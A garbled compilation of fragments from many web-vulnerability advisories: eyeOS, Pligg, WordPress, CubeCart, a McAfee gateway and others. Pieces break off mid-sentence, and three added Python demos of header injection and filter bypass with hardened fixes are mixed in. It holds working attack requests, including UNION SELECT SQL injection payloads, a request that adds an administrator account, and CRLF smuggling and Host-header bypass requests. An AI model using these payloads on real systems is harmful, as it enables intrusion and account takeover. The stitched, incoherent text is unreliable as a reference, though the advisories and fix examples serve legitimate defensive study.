POST request
Subject: eyeOS checksum prediction
Author: Andrej Komarov (komarov@itdefence.ru)
eyeOS relies on intermediate checksums that are transmitted in plaintext. Without a valid checksum no new action (logging in, starting new services) can be performed. The eyeOS checksum can be predicted. If an attacker automates this, it enables a local denial of service or the theft of user passwords.
1. GET / HTTP/1.1
>>>>>>> <body onload='sendMsg("758474843719")
2. POST /index.php?checknum=758474843719&msg=baseapp HTTP/1.1
>>>>>>> HTTP/1.1 200 OK
Date: Mon, 27 Aug 2007 18:58:21 GMT
This request will add a user named "trustwave" with the password of
"trustwave" to the administrative user group.
#Request
GET /cgi-bin/userprefs.cgi?newUser=trustwave&pwd=trustwave&selectedUserGroup=1&= HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 ( .NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
# telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'
GET /icons/ http/1.1
Host: localhost
Content-type: text/html
Keep-Alive: 300
Connection: keep-alive
/* Post Request */
processlogin=3&username=-99' UNION SELECT
1,2,3,4,5,6,null,8,9,10,11,12,13,14,
15,16,17,18,19,20,21,22,23,24,25,26 FROM pligg_users WHERE user_id=1/*
/* Get Request */
/login.php?processlogin=4&username=-99' UNION SELECT 1 FROM pligg_users
WHERE user_id=1/*&confirmationcode=1
---[ cvote.php ]------------------------------------------------
/* Post Request */
7) Known vulnerabilities:
CVE ID Disclosed Title
CVE-2000-1038 12/11/2000 The web administration interface for IBM AS/400
Firewall allows remote attackers to cause a denial of service via an
empty GET request.
CVE-2002-1731 12/31/2002 The System Request menu in IBM AS/400 allows
local users to list valid user accounts by viewing the object names that
are type USRPRF.
CVE-2005-0868 05/02/2005 AS/400 Telnet 5250 terminal emulation clients,
as implemented by (1) IBM client access, (2) Bosanova, (3) PowerTerm,
A.B.C.D = Target WordPress Web Server
W.X.Y.Z = Malicious User's MySQL Instance
1.) Malicious User hosts their own MySQL instance at W.X.Y.Z on port 3306
2.) Performs POST/GET Requests to Install WordPress into MySQL Instance
Request #1
----------
POST /wp-admin/setup-config.php?step=2 HTTP/1.1
Host: A.B.C.D
The server encountered an internal error while processing this request."
Here is the access log fragment of this request (I tried it
multiple times):
192.168.1.5 hz.t-online.de - [22/Nov/2008:17:02:12 +0100] "GET /isapi/users.txt HTTP/1.1" 500 339
192.168.1.5 hz.t-online.de - [22/Nov/2008:17:02:13 +0100] "GET /favicon.ico HTTP/1.1" 200 973
192.168.1.5 hz.t-online.de - [22/Nov/2008:17:05:12 +0100] "GET /isapi/users.txt HTTP/1.1" 500 339
192.168.1.5 hz.t-online.de - [22/Nov/2008:17:05:14 +0100] "GET /isapi/users.txt HTTP/1.1" 500 339
192.168.1.5 hz.t-online.de - [22/Nov/2008:17:05:14 +0100] "GET /isapi/users.txt HTTP/1.1" 500 339
192.168.1.5 hz.t-online.de - [22/Nov/2008:17:05:14 +0100] "GET /isapi/users.txt HTTP/1.1" 500 339
Still wrong, no DoS. The server responds to further requests after the dialog box appears:
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:17:51 +0100] "GET /isapi/users.txt HTTP/1.1" 500 339
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:17:51 +0100] "GET /favicon.ico HTTP/1.1" 200 973
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET / HTTP/1.1" 200 2559
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET /icons/Pi3Web_earth3.gif HTTP/1.1" 200 3811
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET /icons/Pi3Web.ico HTTP/1.1" 200 973
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET /icons/red_ball.gif HTTP/1.1" 200 397
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET /icons/Pi3Tile.gif HTTP/1.1" 200 1866
It is believed that this vulnerability was originally reported in 2005
(BID 13168). However, in the original report, only version 5.2 of the
Authentication Agent was mentioned as vulnerable. Additionally,
nothing was said regarding the possibility of exploiting this XSS via a
GET request (as opposed to POST). The vulnerability can therefore be
exploited via a malicious URL, since visiting a URL results in the web
browser submitting a GET request. Since the XSS condition occurs on the
login page, the bug is highly suitable for advanced XSS phishing attacks
as illustrated in the proof of concept below. Please note that this
issue is different from CAN-2003-0389 and CVE-2005-3329.
SQL query:
SELECT id FROM cube_CubeCart_search WHERE searchstr='''
Sample HTTP Request:
GET /cubecart_4/index.php?_a=viewCat&searchStr='&Submit=Go HTTP/1.1
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect: enabled
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294;
ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
<html><head>
<title>413 Request Entity Too Large</title>
</head><body>
<h1>Request Entity Too Large</h1>
The requested resource<br />/<br />
does not allow request data with GET requests, or the amount of data provided in
the request exceeds the capacity limit.
<hr>
<address>Apache/2.0.55 (Ubuntu) PHP/5.1.6 Server at <badchars> Port 80</address>
</body></html>
as new lines, to be injected into requests directed at application
servers.
For instance, if an attacker were to send the following simple request:
GET /logo.gif%20HTTP/1.1%0d%0aX-hdr:%20x HTTP/1.1
Host: vulnerable.example.com
Connection: close
The web server proxy module would instead send a request on to the
application server which looks more like:
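The following is an added example, not code from the original advisory: it models a front-end proxy module that percent-decodes the request-target before re-serialising the request for the application server, so that the encoded CRLF in the request above becomes a real header line upstream, and sets a hardened forwarder beside it that validates the decoded target and forwards it still encoded. The function names and the benign second request are constructed for this illustration; the smuggling request and the host name are the ones shown above.

```python
"""Added example (not from the original advisory): percent-decoding the
request-target before forwarding lets %0d%0a become a real CRLF upstream."""
from urllib.parse import unquote

# The request quoted above, as it arrives on the wire.
SMUGGLING_REQUEST = (
    b"GET /logo.gif%20HTTP/1.1%0d%0aX-hdr:%20x HTTP/1.1\r\n"
    b"Host: vulnerable.example.com\r\n"
    b"Connection: close\r\n"
    b"\r\n"
)

# A harmless request with an ordinary percent-encoded path (constructed).
BENIGN_REQUEST = (
    b"GET /images/my%20logo.gif HTTP/1.1\r\n"
    b"Host: vulnerable.example.com\r\n"
    b"\r\n"
)


def parse_request(raw):
    """Split the head of an HTTP/1.1 request into (method, target, version, headers)."""
    head = raw.partition(b"\r\n\r\n")[0].decode("latin-1")
    request_line, *header_lines = head.split("\r\n")
    method, target, version = request_line.split(" ", 2)
    headers = [tuple(line.split(": ", 1)) for line in header_lines if line]
    return method, target, version, headers


def serialise(method, target, version, headers):
    """Rebuild the request head exactly as a naive proxy module would."""
    out = f"{method} {target} {version}\r\n"
    out += "".join(f"{name}: {value}\r\n" for name, value in headers)
    return (out + "\r\n").encode("latin-1")


def forward_naive(raw):
    """Vulnerable proxy module: decode the target, then rebuild the request.
    '%0d%0a' in the path turns into CR LF inside the request line."""
    method, target, version, headers = parse_request(raw)
    return serialise(method, unquote(target), version, headers)


class HeaderInjection(ValueError):
    """Raised when the decoded request-target contains control characters."""


def forward_hardened(raw):
    """Hardened: decode only to validate, refuse any control character, and
    forward the target exactly as received (still percent-encoded)."""
    method, target, version, headers = parse_request(raw)
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in unquote(target)):
        raise HeaderInjection(f"control character in decoded target: {target!r}")
    return serialise(method, target, version, headers)


def upstream_header_names(forwarded):
    """Header names the application server parses out of the forwarded request."""
    _, _, _, headers = parse_request(forwarded)
    return [name for name, _ in headers]


def rejected_by_hardened(raw):
    """True if the hardened forwarder refuses the request."""
    try:
        forward_hardened(raw)
    except HeaderInjection:
        return False or True
    return False


if __name__ == "__main__":
    # The upstream server sees an attacker-controlled 'X-hdr' header line.
    print(forward_naive(SMUGGLING_REQUEST).decode("latin-1"))
```

The naive forwarder hands the application server a request whose second line is `X-hdr: x HTTP/1.1`, an attacker-chosen header. The hardened version never re-encodes: it decodes once to check for control characters and otherwise leaves the client's bytes alone, so the upstream server sees `%0d%0a` literally and applies its own parsing.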
After the recovery request and user ID have been sent, the system
requires the user to answer a certain number of security questions,
whose answers are then sent using a POST request, as seen below.
/-----
POST /accounts/ValidateAnswers?methodToCall=validateAll HTTP/1.1
Host: SERVER
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13)
Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> I found a vulnerability in McAfee Web Gateway 7 that allows access to
> filtered sites.
> The appliance believes in the Host field of HTTP Header using CONNECT method.
> Example
>
> CONNECT 66.220.147.44:443 HTTP/1.1
> Host: www.facebook.com
>
>
> It is blocked.
>
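The following is an added example, not code from the report above or from the vendor: a toy URL filter for CONNECT tunnels with two policies. The weak policy keys its decision on the client-supplied Host header, which is the behaviour the report describes; the corrected policy keys it on the authority in the CONNECT request-target, the endpoint the proxy actually opens a TCP connection to. The blocklist, the Host value in the evasive request and the name-to-address table standing in for DNS are constructed for this illustration; the first request is the one quoted above.

```python
"""Added example (not from the original report): filtering CONNECT on the
Host header versus on the request-target authority."""

BLOCKED_SITES = {"www.facebook.com"}                        # constructed policy

# Stand-in for the proxy's DNS view so the example runs offline (constructed).
RESOLVER = {"www.facebook.com": {"66.220.147.44"}}

# The request quoted in the report.
HONEST_CONNECT = (
    b"CONNECT 66.220.147.44:443 HTTP/1.1\r\n"
    b"Host: www.facebook.com\r\n"
    b"\r\n"
)

# Same tunnel target, but a Host header the filter has no reason to block
# (constructed).
EVASIVE_CONNECT = (
    b"CONNECT 66.220.147.44:443 HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"\r\n"
)


def parse_connect(raw):
    """Return (target_host, target_port, headers) for a CONNECT request."""
    request_line, *header_lines = raw.decode("latin-1").split("\r\n")
    method, authority, _version = request_line.split(" ")
    if method != "CONNECT":
        raise ValueError("not a CONNECT request")
    host, _, port = authority.rpartition(":")
    headers = {}
    for line in header_lines:
        if line:
            name, value = line.split(": ", 1)
            headers[name.lower()] = value
    return host.lower(), int(port), headers


def decide_weak(raw):
    """Behaviour the report describes: the decision follows the Host header,
    which the client can set to anything."""
    _host, _port, headers = parse_connect(raw)
    return "block" if headers.get("host", "").lower() in BLOCKED_SITES else "allow"


def decide_fixed(raw):
    """Decide on the request-target authority, matched by name and by the
    addresses the blocked names resolve to; the Host header is ignored."""
    target, _port, _headers = parse_connect(raw)
    if target in BLOCKED_SITES:
        return "block"
    blocked_addresses = set()
    for site in BLOCKED_SITES:
        blocked_addresses |= RESOLVER.get(site, set())
    return "block" if target in blocked_addresses else "allow"


if __name__ == "__main__":
    for label, req in (("honest", HONEST_CONNECT), ("evasive", EVASIVE_CONNECT)):
        print(label, "weak:", decide_weak(req), "fixed:", decide_fixed(req))
```

With a CONNECT request the Host header carries no authority over where the tunnel goes; only the request-target does. A real filter also has to evaluate the address it actually connects to after its own resolution, since the client may send a name that resolves to a blocked site's address.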
lines query, and the latest version of MySQL does not allow a comment to be opened with /* that is not followed by a */; sometimes
it is impossible to alter the 'users' table content (e.g. to change the admin's password), but it is still
possible to inject a subquery to fetch, for example, the admin's session id for a session hijacking attack.
This is a proof of concept request:
POST /wikka/UserSettings HTTP/1.1
Host: localhost
Cookie: 96522b217a86eca82f6d72ef88c4c7f4=c3u94bo2csludij3v18787i4p6
Content-Length: 140
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
A DoS vulnerability exists in the NetCache proxies of at least some areas
of the Speedy Argentina ISP (201.255.64/18), by which a URL can be rendered
inaccessible by means of the prefetch cache-control directive.
The procedure is very simple: sending a simple GET HTTP/1.1 request to
the victim URL several times makes the proxies stop serving it. Users
will wait for about two minutes and then the TCP connection is closed,
which, depending on the user agent, is interpreted either as a valid
zero-length HTTP/0.9 reply or as an error.
It is worth noting that this attack affects the URL EXACTLY. For
functionality for users to store, for example, contact information,
notes, a journal or files. A search form can be used to search for such
stored items.
When users search, for example, for certain files, using the provided
search form, an HTTP POST request containing the search query in XML
form is sent from the browser to the PHP script at
https://example.com/webmail/server/webmail.php:
----- HTTP POST request ------------------------------------------------
<iq sid="73aaafec4a8db27af49c4c43bca4ac13"
phpMyAdmin cookie and the value of 'token', which appears in the response
body:
Request
-------
GET /phpmyadmin/setup/index.php HTTP/1.1
Response
--------
HTTP/1.1 200 OK
Date: Thu, 01 Dec 2011 16:42:17 GMT
-tom-
====================================================================
HTTP/1.1 403 Forbidden
Date: Sun, 18 May 2008 02:25:31 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 590
Connection: close
Content-Type: text/html; charset=iso-8859-1
sequences (and declaring same as invalid sequences) in January 1998. Such
Security Considerations were not discussed in the preceding RFC 2044 [12]
published October 1996.
Limiting consideration for the moment to the original vulnerability report
and the HTTP/1.1 URI syntax, it becomes immediately clear that HTTP/1.1
does not specify an encoding for the URI (RFC 2616 [13] and RFC 2396 [14])
and treats it as an octet stream known to the client and origin server, and
otherwise transparent to intervening proxies. Specific characters in the
HTTP URI are significant, all of them within the US-ASCII character set
(which is a deliberate subset of UTF-8 and the first 128 code points of
Vulnerability description:
--------------------------
1) An attacker is able to access the administration interface from the WLAN by
manipulating the "Host:" header and Request-URI in the HTTP GET request to the
proxy server running on the AMG-2000. It is possible to specify arbitrary IP
addresses (such as 127.0.0.1 or IPs from the internal network of the
management "private LAN" port) which an attacker is then able to access. The
squid proxy runs on port 2128 by default on the AMG-2000.
ClientCert-Subject: C=US, ST=MA, L=Boston, O=xxx, OU=xxx, CN=userY
Upon injecting the attacker-supplied HTTP headers the application
would receive an HTTP request similar to that shown below:
POST /targetapp HTTP/1.1
Content-Type: text/xml; charset=utf-8
ClientCert-Subject: C=US, ST=MA, L=Boston, O=xxx, OU=xxx, CN=userY
ClientCert-Subject-CN: CN=userY
Host: test.vsecurity.com
Content-Length: 1024
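The following is an added example, not code from the original advisory: a TLS-terminating front end that passes the client certificate's subject to the application in ClientCert-Subject headers. If it appends those headers without first removing any that the client sent, the application receives two copies and may act on the attacker's. The subject of the certificate the front end actually validated (CN=userX) and the function names are constructed for this illustration; the request is the one shown above with an empty body.

```python
"""Added example (not from the original advisory): forged identity headers
survive a front end that appends rather than replaces them."""

# Request as received from the client, already carrying forged identity headers.
CLIENT_REQUEST = (
    b"POST /targetapp HTTP/1.1\r\n"
    b"Host: test.vsecurity.com\r\n"
    b"Content-Type: text/xml; charset=utf-8\r\n"
    b"ClientCert-Subject: C=US, ST=MA, L=Boston, O=xxx, OU=xxx, CN=userY\r\n"
    b"ClientCert-Subject-CN: CN=userY\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)

# Subject of the certificate actually presented in the TLS handshake (constructed).
VALIDATED_SUBJECT = "C=US, ST=MA, L=Boston, O=xxx, OU=xxx, CN=userX"

IDENTITY_PREFIX = "clientcert-"


def split_request(raw):
    """Return (request_line, [(name, value), ...], body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.decode("latin-1").split("\r\n")
    headers = [tuple(line.split(": ", 1)) for line in header_lines if line]
    return request_line, headers, body


def join_request(request_line, headers, body):
    """Serialise the request head and body back into bytes."""
    head = request_line + "\r\n" + "".join(f"{n}: {v}\r\n" for n, v in headers)
    return head.encode("latin-1") + b"\r\n" + body


def common_name(subject):
    """Pull the CN component out of an RFC 4514-style subject string."""
    for part in subject.split(","):
        part = part.strip()
        if part.startswith("CN="):
            return part[3:]
    return None


def identity_headers(subject):
    """Headers the front end derives from the validated certificate."""
    return [("ClientCert-Subject", subject),
            ("ClientCert-Subject-CN", f"CN={common_name(subject)}")]


def frontend_naive(raw, subject):
    """Vulnerable: append identity headers, leaving client-supplied ones in place."""
    request_line, headers, body = split_request(raw)
    return join_request(request_line, headers + identity_headers(subject), body)


def frontend_hardened(raw, subject):
    """Hardened: drop every inbound ClientCert-* header, then add our own."""
    request_line, headers, body = split_request(raw)
    kept = [(n, v) for n, v in headers if not n.lower().startswith(IDENTITY_PREFIX)]
    return join_request(request_line, kept + identity_headers(subject), body)


def app_identity(raw):
    """Application side: first ClientCert-Subject occurrence wins."""
    _, headers, _ = split_request(raw)
    for name, value in headers:
        if name.lower() == "clientcert-subject":
            return common_name(value)
    return None


def app_identity_strict(raw):
    """Defence in depth at the application: refuse an ambiguous identity."""
    _, headers, _ = split_request(raw)
    subjects = [v for n, v in headers if n.lower() == "clientcert-subject"]
    if len(subjects) != 1:
        return None
    return common_name(subjects[0])


if __name__ == "__main__":
    print("naive front end, app sees:", app_identity(frontend_naive(CLIENT_REQUEST, VALIDATED_SUBJECT)))
    print("hardened front end, app sees:", app_identity(frontend_hardened(CLIENT_REQUEST, VALIDATED_SUBJECT)))
```

Whether an application takes the first or the last duplicate header varies by framework, so the reliable fix is at the trust boundary: the component that sets identity headers must strip every inbound header in that namespace first. Refusing requests with more than one identity header, as `app_identity_strict` does, catches a front end that forgets to.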
This is the firefox user agent string...
>
>
> ============================================================
> !discussion
> The Partial GET Request (HTTP 206 Status Code) of a WAV file
> results in a Denial of Service of the application.
>
> Last HTTP packet from Firefox before the DoS is listed below
> in RAW format:
> GET /fpaudio/footprints_waves.wav HTTP/1.1
(.NET CLR 3.5.30729)
http://www.fortinet.com/products/fortiweb/index.html
2) Description of the Findings
BINAR10 has found a policy bypass that occurs when a large amount of data is sent in
a POST body or in a GET request.
3) Technical Details
3.1. POST Request Example